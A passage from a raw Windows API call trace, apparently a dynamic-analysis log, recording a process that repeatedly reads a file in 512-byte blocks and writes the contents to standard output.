lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 
[0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] GetFileType (hFile=0x4c) returned 0x1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.674] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0202.675] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.675] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] GetFileType (hFile=0x4c) returned 0x1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.675] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.676] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.676] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType 
(hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.676] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.676] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.676] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.677] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.677] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, 
lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] GetFileType (hFile=0x4c) returned 0x1 [0202.677] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.677] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, 
lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.678] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.678] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] GetFileType (hFile=0x4c) returned 0x1 [0202.678] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.678] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, 
lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.679] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.679] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.679] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.679] GetFileType (hFile=0x4c) returned 0x1 [0202.679] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] GetFileType (hFile=0x4c) returned 0x1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.680] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.680] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.680] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.680] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, 
lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: 
lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.682] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.682] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle 
